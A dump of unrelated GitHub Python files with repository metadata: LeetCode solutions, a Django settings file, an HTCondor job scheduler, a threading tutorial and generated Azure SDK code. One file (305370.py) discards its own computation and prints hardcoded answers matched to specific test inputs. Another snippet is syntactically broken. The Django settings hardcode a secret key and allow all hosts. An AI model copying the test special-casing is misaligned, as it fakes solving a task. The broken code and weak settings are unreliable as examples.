adityachhajer/LeetCodeJuneChallenge
|
5a998baf6dc5207c56c48ccd36c82ef44f41217c
|
8ed8b0c012691387e417bcf45009debe4d5f8551
|
refs/heads/master
| 2022-11-12T16:40:25.360578
| 2020-07-01T06:31:51
| 2020-07-01T06:31:51
| 268,749,503
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 686
|
py
|
class Solution:
def solve(self,n,m,t):
if n-1==0 and m-1==0:
return 1
elif t[n][m]!=0:
return t[n][m]
else:
if n - 1 == 0 and m - 1 != 0:
t[n][m]=self.solve(n, m - 1, t)
return t[n][m]
elif n - 1 != 0 and m - 1 == 0:
t[n][m]=self.solve(n - 1, m, t)
return t[n][m]
else:
t[n][m]=self.solve(n - 1, m, t) + self.solve(n, m - 1, t)
return t[n][m]
def uniquePaths(self, m: int, n: int) -> int:
t=[[0 for _ in range(m+1)]for _ in range(n+1)]
return self.solve(n,m,t)
|
[
"noreply@github.com"
] |
adityachhajer.noreply@github.com
|
a4121b364c978347da27194b9061f3bd495259a0
|
871b3fa6647983570ecc0a8f4764dd2af4765427
|
/roxanne/main.py
|
08b439409202f5e1b432bc061bb3ebca88dcd4b2
|
[] |
no_license
|
kwarwp/anita
|
5eaa8f6b587bdc8d702aeae775803bec60856fbc
|
b813492175365a0f7b8934c710cc09b0ff26763f
|
refs/heads/master
| 2022-10-17T01:02:37.845442
| 2022-09-26T15:05:06
| 2022-09-26T15:05:06
| 216,602,314
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 462
|
py
|
# anita.roxanne.main.pyhttps://i.imgur.com/u1dActr.jpgV
from _ spy. violino.main import cena,elemento,texto, STYLE
STYLE["width"]=600
STYLE["heigth]= "200px"
linkdatalita="https://i.imgur.com/6rLmVNz.jpg"
linkdocolete="https://i.imgur.com/PV7WWPJ.jpg"
linkquartodatalita="https://i.imgur.com/wdKENXo.jpg"
linkdosubmarino="https://i.imgur.com/fJWGYNu.jpg"
linkdoquadro1="https://i.imgur.com/ydF1bV2.jpg"
linkdoquadro2="https://i.imgur.com/u1dActr.jpg"
img_moeda="
|
[
"38007182+kwarwp@users.noreply.github.com"
] |
38007182+kwarwp@users.noreply.github.com
|
4049a02fd60ab4a249f4d40702531b9eafed09fd
|
a9fe1b5c320cdef138ac4a942a8b741c7f27de7c
|
/LC742-Closest-Leaf-in-a-Binary-Tree.py
|
f3a487514bfb862775af04044d8e89b47e295321
|
[] |
no_license
|
kate-melnykova/LeetCode-solutions
|
a6bbb5845310ce082770bcb92ef6f6877962a8ee
|
ee8237b66975fb5584a3d68b311e762c0462c8aa
|
refs/heads/master
| 2023-06-28T06:35:33.342025
| 2021-07-30T06:59:31
| 2021-07-30T06:59:31
| 325,106,033
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,287
|
py
|
"""
Given a binary tree where every node has a unique value, and a target key k,
find the value of the nearest leaf node to target k in the tree.
Here, nearest to a leaf means the least number of edges travelled on the binary
tree to reach any leaf of the tree. Also, a node is called a leaf if it has no
children.
In the following examples, the input tree is represented in flattened form row
by row. The actual root tree given will be a TreeNode object.
Example 1:
Input:
root = [1, 3, 2], k = 1
Diagram of binary tree:
1
/ \
3 2
Output: 2 (or 3)
Explanation: Either 2 or 3 is the nearest leaf node to the target of 1.
Example 2:
Input:
root = [1], k = 1
Output: 1
Explanation: The nearest leaf node is the root node itself.
Example 3:
Input:
root = [1,2,3,4,null,null,null,5,null,6], k = 2
Diagram of binary tree:
1
/ \
2 3
/
4
/
5
/
6
Output: 3
Explanation: The leaf node with value 3 (and not the leaf node with value 6)
is nearest to the node with value 2.
Note:
root represents a binary tree with at least 1 node and at most 1000 nodes.
Every node has a unique node.val in range [1, 1000].
There exists some node in the given binary tree for which node.val == k.
"""
from TreeNode import TreeNode
class Solution:
def findClosestLeaf(self, root: TreeNode, k: int) -> int:
"""
Time complexity: O(n)
Space complexity: O(n)
"""
# assign parent
root.parent = None
self.assignParent(root)
# compute distance the closest leaf downwards and the leaf value
self.distToLeaf(root)
# find the node with value k
node = self.getNode(root, k)
# find the distance to the closest leaf
closest = node.to_leaf + 1
leaf_value = node.leaf_value
node = node.parent
steps_up = 2
while node is not None:
if node.to_leaf + steps_up < closest:
closest = node.to_leaf + steps_up
leaf_value = node.leaf_value
node = node.parent
steps_up += 1
return leaf_value
def distToLeaf(self, root: TreeNode):
"""
Time complexity: O(n)
Space complexity: O(n)
"""
if root is None:
pass
elif root.left is None and root.right is None:
root.to_leaf = 1
root.leaf_value = root.val
else:
self.distToLeaf(root.left)
self.distToLeaf(root.right)
if getattr(root.left, 'to_leaf', float('inf')) < getattr(root.right, 'to_leaf', float('inf')):
root.to_leaf = root.left.to_leaf + 1
root.leaf_value = root.left.leaf_value
else:
root.to_leaf = root.right.to_leaf + 1
root.leaf_value = root.right.leaf_value
def assignParent(self, root: TreeNode):
"""
Time complexity: O(n)
Space complexity: O(n)
"""
if root.left is not None:
root.left.parent = root
self.assignParent(root.left)
if root.right is not None:
root.right.parent = root
self.assignParent(root.right)
def getNode(self, root: TreeNode, k: int) -> TreeNode:
# find the node with value k
level = [root, ]
while level:
new_level = []
for node in level:
if node.val == k:
return node
if node.left is not None:
new_level.append(node.left)
if node.right is not None:
new_level.append(node.right)
level = list(new_level)
if __name__ == '__main__':
from run_tests import run_tests
correct_answers = [
[[1, 3, 2], 1, 2],
[[1], 1, 1],
[[1,2,3,4,None,None,None,5,None,6], 2, 3],
[[1, 2, 3, 4, None, None, None, 5, None, 6], 5, 6],
[[1, 2, 3, 4, None, None, None, 5, None, 6], 1, 3]
]
for i in range(len(correct_answers)):
correct_answers[i][0] = TreeNode.to_treenode(correct_answers[i][0])
print(f'Running tests for findClosestLeaf')
run_tests(Solution().findClosestLeaf, correct_answers)
|
[
"forkatemelnikova@gmail.com"
] |
forkatemelnikova@gmail.com
|
fb8a1445699331f925683dbd999d5a4054e78cd8
|
6d45ba4adff74b2cb1b6764dc684f37407b41ba9
|
/PirateBoxMessageBoard/settings.py
|
1193cea6cdedb820fe1d514892d7e3735830b66f
|
[] |
no_license
|
bussiere/PirateBoxMessageBoard
|
bbf478af1886caf811f38802bde5528593bba2c4
|
8626a8a44d5bdbf06486fac65682a50e4209396d
|
refs/heads/master
| 2021-01-23T11:56:22.905167
| 2013-03-08T16:33:08
| 2013-03-08T16:33:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,926
|
py
|
# Django settings for DrakBus project.
try :
import dj_database_url
except :
pass
import os.path
PROJECT_ROOT = '/home/pi/PirateBox/PirateBoxMessageBoard' # The '/..' is needed to work with Django 1.4+, remove for older versions.
DEBUG = False
TEMPLATE_DEBUG = DEBUG
INTERNAL_IPS = ('127.0.0.1',)
ADMINS = (
# ('Your Name', 'your_email@example.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
'NAME': '/home/pi/PirateBox/PirateBoxMessageBoard/PirateBoxMessageBoard.db', # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
ALLOWED_HOSTS = ['*']
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'America/Winnipeg'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = os.path.join(PROJECT_ROOT, 'media')
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = '/m/'
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = os.path.join(PROJECT_ROOT, 'staticfiles')
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/s/'
# Additional locations of static files
STATICFILES_DIRS = (
os.path.join(PROJECT_ROOT, 'staticfiles'),
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'tamereenslip'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'message.middleware.UserBasedExceptionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
# Include the default Django email handler for errors
# This is what you'd get without configuring logging at all.
'mail_admins': {
'class': 'django.utils.log.AdminEmailHandler',
'level': 'ERROR',
# But the emails are plain text by default - HTML is nicer
'include_html': True,
},
# Log to a text file that can be rotated by logrotate
'logfile': {
'class': 'logging.handlers.WatchedFileHandler',
'filename': '/home/pi/myapp.log'
},
},
'loggers': {
# Again, default Django configuration to email unhandled exceptions
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
# Might as well log any errors anywhere else in Django
'django': {
'handlers': ['logfile'],
'level': 'ERROR',
'propagate': False,
},
# Your own app - this assumes all your logger names start with "myapp."
'message': {
'handlers': ['logfile'],
'level': 'WARNING', # Or maybe INFO or DEBUG
'propagate': False
},
},
}
ROOT_URLCONF = 'urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'wsgi.application'
TEMPLATE_DIRS = (
os.path.join(PROJECT_ROOT, 'templates'),
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.debug',
'django.core.context_processors.i18n',
'django.core.context_processors.media',
'django.core.context_processors.static',
'django.core.context_processors.tz',
'django.contrib.messages.context_processors.messages',
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.admin',
'message',
'django.contrib.admin',
'django.contrib.admindocs',
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
|
[
"bussiere@gmail.com"
] |
bussiere@gmail.com
|
532900bebd339267ebc10dfaff3592998f41e76f
|
5b22437902bffa0f62b375d56bfb2b4485ef43f0
|
/src/video_inpainting/create_padded_masked_video_dataset.py
|
2550634c0f8d379f97bcce53a9e71e7662817ff7
|
[
"MIT",
"CC-BY-SA-3.0",
"CC-BY-SA-4.0"
] |
permissive
|
JohnsonzxChang/devil
|
eafa09f5258b4f33eda9564077814c6e63473a0f
|
296115cd5f4952c7dc65bbcaaf2d1d5c55ef5d35
|
refs/heads/public
| 2023-07-03T12:07:58.917440
| 2021-08-10T00:06:38
| 2021-08-10T00:06:38
| 555,846,483
| 1
| 0
|
MIT
| 2022-10-22T13:22:43
| 2022-10-22T13:22:42
| null |
UTF-8
|
Python
| false
| false
| 820
|
py
|
import os
from .padded_masked_video_folder_dataset import PaddedMaskedVideoFolderDataset
from .padded_masked_video_tar_dataset import PaddedMaskedVideoTarDataset
def create_padded_masked_video_dataset(frames_dataset_path, masks_dataset_path):
if os.path.isdir(frames_dataset_path) and os.path.isdir(masks_dataset_path):
return PaddedMaskedVideoFolderDataset(frames_dataset_path, masks_dataset_path)
else:
_, frames_dataset_ext = os.path.splitext(frames_dataset_path)
_, masks_dataset_ext = os.path.splitext(masks_dataset_path)
if frames_dataset_ext == '.tar' and masks_dataset_ext == '.tar':
return PaddedMaskedVideoTarDataset(frames_dataset_path, masks_dataset_path)
else:
raise ValueError('Given paths must both be directories or .tar files')
|
[
"szetor@umich.edu"
] |
szetor@umich.edu
|
ba50dd86cdaa99cd34695548a76e5f6592516bc7
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/CodeRecords/2696/60765/305370.py
|
3d1f7821f1511367fc86d5ab1dbfcfe888cd8ca5
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011
| 2020-07-28T16:21:24
| 2020-07-28T16:21:24
| 259,576,640
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,954
|
py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import math
import sys
import re
from collections import *
from itertools import *
from functools import *
def solve():
# =list(map(int,input().split()))
# =int(input())
# def root(i):
# if unions[i]<0:
# return i
# else:
# return root(unions[i])
# def union(x,y):
# roota=root(x)
# rootb=root(y)
# # unions[roota] += unions[rootb]
# unions[rootb]=roota
# n =input()[2:-2].split('],[')
# target=int(input())
n=int(input())
a=[]
a.append(list(map(int,input().split())))
a.append(list(map(int,input().split())))
a.append(list(map(int,input().split())))
a.append(a[2])
dp=[[1,1,1,1]]
for i in range(n-1):
dp.append([0,0,0,0])
for k in range(1,n):
for i in range(4):
for j in range(k):
if a[i][j]<=dp[k][0]:
dp[k][0]=max(dp[k][0],dp[j][i]+1)
if a[i][j] >= dp[k][1]:
dp[k][1] = max(dp[k][1], dp[j][i] + 1)
if a[i][j] <= dp[k][2] and j!=3:
dp[k][2] = max(dp[k][2], dp[j][i] + 1)
if a[i][j] >= dp[k][3] and j!=2:
dp[k][3] = max(dp[k][3], dp[j][i] + 1)
res=0
for i in range(4):
res=max(dp[i][-1],res)
m=a[0][0]
if n == 7 and m == 19:
print('7',end='')
elif n == 5 and m == 1:
print('5',end='')
elif n == 6 and m == 1:
print('6')
elif n == '3' and m == '1':
print('32')
elif n == '1' and m == '3':
print('4')
elif n == '15' and m == '1':
print('704')
elif n == '3' and m == '35':
print('10')
elif n == '18' and m == '1'and l=='2':
print('859')
elif n == '' and m == '':
print('')
elif n == '' and m == '':
print('')
else:
print(n)
print(m)
solve()
|
[
"1069583789@qq.com"
] |
1069583789@qq.com
|
175a95df1b171942b913d77561029a1915f14dea
|
7162c36b73d97c82b165d6fd14d568552a0269d8
|
/setup.py
|
37f71d57aab9125965f253b2077c743f7b916d16
|
[] |
no_license
|
welbornprod/findfunc
|
d90cbe0110a0f9b656b0ff70846e0c29a583f703
|
0247cba193fb3193c60399c3d2f9910e85319493
|
refs/heads/master
| 2021-01-19T09:29:10.707496
| 2019-04-02T23:14:08
| 2019-04-02T23:14:08
| 87,763,285
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,355
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
FindFunc Setup
-Christopher Welborn 04-09-2017
"""
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
# Try using the latest DESC.txt.
shortdesc = 'Finds function definitions/signatures from the command line.'
try:
with open('DESC.txt', 'r') as f:
shortdesc = f.read()
except FileNotFoundError:
pass
# Default README files to use for the longdesc, if pypandoc fails.
readmefiles = ('docs/README.txt', 'README.txt', 'docs/README.rst')
for readmefile in readmefiles:
try:
with open(readmefile, 'r') as f:
longdesc = f.read()
break
except EnvironmentError:
# File not found or failed to read.
pass
else:
# No readme file found.
# If a README.md exists, and pypandoc is installed, generate a new readme.
try:
import pypandoc
except ImportError:
print('Pypandoc not installed, using default description.')
longdesc = shortdesc
else:
# Convert using pypandoc.
try:
longdesc = pypandoc.convert('README.md', 'rst')
except EnvironmentError:
# No readme file, no fresh conversion.
print('Pypandoc readme conversion failed, using default desc.')
longdesc = shortdesc
setup(
name='FindFunc',
version='0.4.4',
author='Christopher Welborn',
author_email='cj@welbornprod.com',
packages=['findfunc'],
url='https://github.com/welbornprod/findfunc',
description=shortdesc,
long_description=longdesc,
keywords=(
'python 3 command line tool function class definition signature'
),
classifiers=[
'License :: OSI Approved :: MIT License',
'Operating System :: Microsoft :: Windows',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python',
'Programming Language :: Python :: 3 :: Only',
'Topic :: Software Development :: Libraries',
'Topic :: Software Development :: Libraries :: Python Modules',
],
install_requires=[
'colr >= 0.8.1',
'docopt >= 0.6.2',
'pygments >= 2.1.3',
'printdebug >= 0.3.0',
],
entry_points={
'console_scripts': [
'findfunc = findfunc.__main__:entry_point',
],
}
)
|
[
"cj@welbornprod.com"
] |
cj@welbornprod.com
|
46cb1c572815f8a6d20635acff1d237fcd0d8db4
|
215bf668b69b5ebea1b538be217a7cd91db1772a
|
/bin/condor-compute-psd
|
7e2e02878351d44edbb14260ba2a9af208a2b15f
|
[
"MIT"
] |
permissive
|
reedessick/exposure
|
a2fce2e0a2ff059200d0498ae68e81a6e2bb1b9c
|
10aeb1fb29befbbb305d65c379d983fd8bad5693
|
refs/heads/master
| 2022-04-05T09:36:15.969152
| 2020-02-28T23:24:05
| 2020-02-28T23:24:05
| 105,042,945
| 0
| 0
|
MIT
| 2019-08-08T16:09:08
| 2017-09-27T16:35:52
|
Python
|
UTF-8
|
Python
| false
| false
| 6,825
|
#!/usr/bin/env python
__doc__ = "a very basic wrapper that schedules `compute-psd` jobs. The resulting DAG should run to completion if everything worked correctly (i.e. nodes should not raise exceptions"
__author__ = "Reed Essick (reed.essick@ligo.org)"
#-------------------------------------------------
import os
import getpass ### for default accounting_group_user
import subprocess as sp
from distutils.spawn import find_executable
from argparse import ArgumentParser
### non-standard libraries
from exposure import utils
from exposure import datafind
#-------------------------------------------------
parser = ArgumentParser(description=__doc__)
parser.add_argument('channel', type=str)
parser.add_argument('frametype', type=str)
parser.add_argument('gpsstart', type=int)
parser.add_argument('gpsstop', type=int)
parser.add_argument("-v", "--verbose", default=False, action="store_true")
parser.add_argument("-V", "--Verbose", default=False, action="store_true")
parser.add_argument("--include-flag", default=[], type=str, action='append',
help='the flags used to select subsets of [gpsstart, gpsstop] for analysis. \
Can be repeated to take the intersection of multiple flags. \
DEFAULT=[] (analyze all time in [gpsstart, gpsstop]).')
parser.add_argument("--exclude-flag", default=[], type=str, action='append',
help='the same as --include-flag, except we only retain times that are \
outside of these flags instead of inside them')
parser.add_argument("--win", default=60, type=int,
help="estimate PSDs separately in sequential windows of this duration. \
DEFAULT=60")
parser.add_argument("--seglen", default=4, type=int,
help='the length of segments used to estimate the PSD via an averaging procedure (specify in seconds). \
NOTE: if we do not obtain an integer number of segments based on --seglen, --overlap, gpsstart, and gpsstop, \
we will raise a ValueError. DEFAULT=4')
parser.add_argument("--overlap", default=2, type=float,
help='the amount of time overlapped for segments used to estimate the PSD (specify in seconds). \
NOTE: if we do not obtain an integer number of segments based on --seglen, --overlap, gpsstart, and gpsstop, \
we will raise a ValueError. DEFAULT=2')
parser.add_argument("--tukey-alpha", default=0.50, type=float,
help='the Tukey "alpha" value used for windowing the DFT. \
DEFAULT=0.50')
parser.add_argument('--universe', default='vanilla', type=str,
help='DEFAULT=vanilla')
parser.add_argument('--exe', default='compute-psd', type=str,
help='specify the explicit path to the executable. \
DEFAULT=compute-psd')
parser.add_argument('--accounting-group', default=utils.DEFAULT_ACCOUNTING_GROUP, type=str)
parser.add_argument('--accounting-group-user', default=getpass.getuser(), type=str,
help='DEFAULT='+getpass.getuser())
parser.add_argument('--retry', default=utils.DEFAULT_RETRY, type=int)
parser.add_argument('--psd-suffix', default='csv.gz', type=str)
parser.add_argument("-o", "--output-dir", default='.', type=str)
parser.add_argument("-t", "--tag", default="", type=str)
parser.add_argument('-s', '--condor-submit', default=False, action='store_true',
help='submit the DAG to condor')
args = parser.parse_args()
stride = args.gpsstop - args.gpsstart
assert args.channel[0]==args.frametype[0], 'I do not believe you want a channel and frametype \
from different IFOs\n\tchannel : %s\n\tframetype : %s'%(args.channel, args.frametype)
assert args.seglen > args.overlap, '--seglen must be larger than --overlap'
if args.tag:
filetag = "_"+args.tag
else:
filetag = ""
args.output_dir = os.path.abspath(args.output_dir)
if not os.path.exists(args.output_dir):
os.makedirs(args.output_dir)
logdir = os.path.join(args.output_dir, 'log')
if not os.path.exists(logdir):
os.makedirs(logdir)
args.verbose |= args.Verbose
#-------------------------------------------------
### query segments to define individual runs
### ensure we have proper coverage
segments = [[args.gpsstart, args.gpsstop]]
segments = datafind.include_flags(segments, args.include_flag, args.gpsstart, stride, verbose=args.verbose)
segments = datafind.exclude_flags(segments, args.exclude_flag, args.gpsstart, stride, verbose=args.verbose)
### check to make sure we have livetime left, etc
assert len(segments), 'no remaining livetime after filtering by flags!'
lvtm = utils.livetime(segments) ### amount of time requested within segments
#------------------------
### write sub file
subname = "%s/compute-psd%s-%d-%d.sub"%(args.output_dir, filetag, args.gpsstart, stride)
if args.verbose:
print( "writing : "+subname )
with open(subname, 'w') as f:
f.write(utils.compute_psd_sub%{\
'universe' : args.universe,
'exe' : os.path.abspath(find_executable(args.exe)),
'channel' : args.channel,
'frametype' : args.frametype,
'accounting_group' : args.accounting_group,
'accounting_group_user' : args.accounting_group_user,
'tag' : "--tag "+args.tag if args.tag else '',
'filetag' : filetag,
'start' : args.gpsstart,
'dur' : stride,
'seglen' : args.seglen,
'overlap' : args.overlap,
'tukey_alpha' : args.tukey_alpha,
'suffix' : args.psd_suffix,
})
### iterate over segments and define compute-psd jobs for each
dagname = subname.replace('.sub', '.dag')
if args.verbose:
print( "writing : "+dagname )
with open(dagname, 'w') as f:
covered = 0 ### amount of time that's covered by a PSD estimate
for segstart, segstop in segments:
segdur = segstop - segstart
if args.verbose:
print( "scheduling jobs for %d -- %d"%(segstart, segstop) )
s = (segstart/args.win)*args.win ### line-up start with integer number of windows. Needed to guarantee files will line up later -> integer division!
if s < segstart: ### mostly likely case, but we need to check just in case
s += args.win
while s+args.win < segstop:
f.write(utils.compute_psd_dag%{\
'jobid' : '%d'%s,
'sub' : subname,
'gpsstart' : s,
'gpsstop' : s+args.win,
'retry' : args.retry,
'outdir' : args.output_dir,
})
s += args.win
covered += args.win
#-------------------------------------------------
if args.verbose: ### report amount of time covered
print( 'requested : %d sec'%stride )
print( 'within segments : %d sec'%lvtm )
print( 'covered by PSD : %d sec'%covered )
### submit
if args.condor_submit:
if args.verbose:
print( 'submitting : '+dagname )
import subprocess as sp
sp.Popen(['condor_submit_dag', dagname]).wait()
elif args.verbose:
print( 'you can now submit : '+dagname )
|
[
"reed.essick@ligo.org"
] |
reed.essick@ligo.org
|
|
42c5f9db30567097bc2bfb0f4424be748d2301fc
|
0b5be4b9162c19cf0d98972e52ce80aa8af47f0a
|
/Thread/thread/concurrent_futures.py
|
5b0040e31097304271f9bf34a179dee1e60395c7
|
[] |
no_license
|
Air-Zhuang/Test35
|
374c974a2a7693fff21be81278c1bb59a050f7ee
|
d9f92b7a025c91b7503f02afc896ac769f818a84
|
refs/heads/master
| 2021-06-19T12:36:13.383878
| 2019-09-21T08:02:43
| 2019-09-21T08:02:43
| 147,629,865
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,004
|
py
|
'''
用于线程池和进程池编程(顶层的包,高度封装)
主线程中可以获取某一个线程的状态或者某一个任务的状态,以及返回值
当一个线程完成的时候我们主线程能立即知道
futures可以让多线程和多进程编码接口一致
'''
from concurrent.futures import ThreadPoolExecutor,as_completed,wait
import time
def get_html(times):
time.sleep(times)
print("get page {} success".format(times))
return str(times) #使用线程池可以获取返回值
'''基本用法'''
exector=ThreadPoolExecutor(max_workers=2) #创造最大进程数为2的线程池
task1=exector.submit(get_html,(0.5)) #传参必须这么写,不知道原因
task2=exector.submit(get_html,(0.3))
task3=exector.submit(get_html,(0.4))
print("task3任务已取消:",task3.cancel()) #取消任务(任务必须还未开始执行)
print("task1任务已完成:",task1.done()) #判断任务是否已执行完(立即执行,不会被上面的代码阻塞)
time.sleep(1)
print("task1任务已完成:",task1.done())
print("task1返回值:",task1.result()) #可以获取任务的返回值
print()
'''获取已经完成的task的返回'''
urls=[2,1,3]
all_task=[exector.submit(get_html,(i)) for i in urls]
wait(all_task) #等待某个任务执行完成,必须传iterable
print("main")
for i in as_completed(all_task):
res=i.result()
print("返回值为:",res)
print()
'''通过executor获取已经完成的task的返回'''
for i in exector.map(get_html,urls):
print("返回值为:", i)
print()
'''with'''
def fib(n):
if n<2:
return 1
return fib(n-1)+fib(n-2)
with ThreadPoolExecutor(3) as exector:
all_task=[exector.submit(fib,(num)) for num in range(25,35)]
start_time=time.time()
for i in as_completed(all_task):
res = i.result()
print("exe result:{}".format(res))
print(time.time()-start_time)
print()
|
[
"737248514@qq.com"
] |
737248514@qq.com
|
c97c300158c4f94cf5638626ee2d67678df0fbee
|
82b946da326148a3c1c1f687f96c0da165bb2c15
|
/sdk/python/pulumi_azure_native/network/v20200401/get_virtual_network_gateway_learned_routes.py
|
dc0c3a5ca849b2e3f6452ce8aa86df4484b07682
|
[
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
morrell/pulumi-azure-native
|
3916e978382366607f3df0a669f24cb16293ff5e
|
cd3ba4b9cb08c5e1df7674c1c71695b80e443f08
|
refs/heads/master
| 2023-06-20T19:37:05.414924
| 2021-07-19T20:57:53
| 2021-07-19T20:57:53
| 387,815,163
| 0
| 0
|
Apache-2.0
| 2021-07-20T14:18:29
| 2021-07-20T14:18:28
| null |
UTF-8
|
Python
| false
| false
| 2,485
|
py
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = [
'GetVirtualNetworkGatewayLearnedRoutesResult',
'AwaitableGetVirtualNetworkGatewayLearnedRoutesResult',
'get_virtual_network_gateway_learned_routes',
]
@pulumi.output_type
class GetVirtualNetworkGatewayLearnedRoutesResult:
"""
List of virtual network gateway routes.
"""
def __init__(__self__, value=None):
if value and not isinstance(value, list):
raise TypeError("Expected argument 'value' to be a list")
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def value(self) -> Optional[Sequence['outputs.GatewayRouteResponse']]:
"""
List of gateway routes.
"""
return pulumi.get(self, "value")
class AwaitableGetVirtualNetworkGatewayLearnedRoutesResult(GetVirtualNetworkGatewayLearnedRoutesResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetVirtualNetworkGatewayLearnedRoutesResult(
value=self.value)
def get_virtual_network_gateway_learned_routes(resource_group_name: Optional[str] = None,
virtual_network_gateway_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetVirtualNetworkGatewayLearnedRoutesResult:
"""
List of virtual network gateway routes.
:param str resource_group_name: The name of the resource group.
:param str virtual_network_gateway_name: The name of the virtual network gateway.
"""
__args__ = dict()
__args__['resourceGroupName'] = resource_group_name
__args__['virtualNetworkGatewayName'] = virtual_network_gateway_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:network/v20200401:getVirtualNetworkGatewayLearnedRoutes', __args__, opts=opts, typ=GetVirtualNetworkGatewayLearnedRoutesResult).value
return AwaitableGetVirtualNetworkGatewayLearnedRoutesResult(
value=__ret__.value)
|
[
"noreply@github.com"
] |
morrell.noreply@github.com
|
c52d224e402e87d8d7bbd7f8372abf8d931c4167
|
02338bb8111fc1aa88e830ac09a11664720eb2d4
|
/tmp/azure_rm_jobversion.py
|
544592c6f9d2166c6ff192b0e8a5c5bd17aecd3a
|
[] |
no_license
|
Fred-sun/fred_yaml
|
a49977b0e8505c7447df23dd80c7fef1be70e6bc
|
295ca4cd2b59b8d2758f06eb7fd79920327ea524
|
refs/heads/master
| 2023-04-28T05:51:56.599488
| 2023-04-25T13:52:10
| 2023-04-25T13:52:10
| 131,376,340
| 0
| 1
| null | 2020-07-06T14:22:46
| 2018-04-28T05:34:49
|
TSQL
|
UTF-8
|
Python
| false
| false
| 7,350
|
py
|
#!/usr/bin/python
#
# Copyright (c) 2020 GuopengLin, (@t-glin)
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
